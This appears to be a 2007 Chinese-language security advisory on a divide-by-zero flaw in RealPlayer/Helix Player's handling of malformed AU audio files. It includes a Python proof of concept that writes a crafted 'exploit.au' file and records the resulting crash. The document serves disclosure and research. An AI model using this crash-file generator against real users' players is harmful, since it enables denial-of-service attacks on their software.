发布日期：2007-09-11
更新日期：2007-09-11

受影响系统：

Real Networks RealPlayer <= 10.1.0.3114

描述：

---

RealPlayer是一款非常流行的媒体播放器，支持多种格式；HelixPlayer是其开源版本。

RealPlayer/Helix Player在解析畸形AU文件时存在除零错误，成功利用后可导致拒绝服务。

<*来源：Nagendra Kumar G
        Chandan S
        Arun Kethipelly
  
  链接：http://www.securityfocus.com/archive/1/479081
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

The following Python program will generate a malformed .au file

import sys

import os

head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+

"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +

"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"

try:

f = open("exploit.au",'w')

except IOError, e:

print "Unable to open file ", e

sys.exit(0)

print "[x] File successfully opened for writing."

try:

f.write(head)

except IOError, e:

print "Unable to write to file ", e

sys.exit(0)

print "[x] File successfully written."

f.close()

print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."

#End of program

RealPlayer crashes with the following exception,

Floating point exception$REALPLAYBIN "$@"

建议：

---

厂商补丁：

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://service.real.com/realplayer/security/

浏览次数：2489
严重程度：0（网友投票）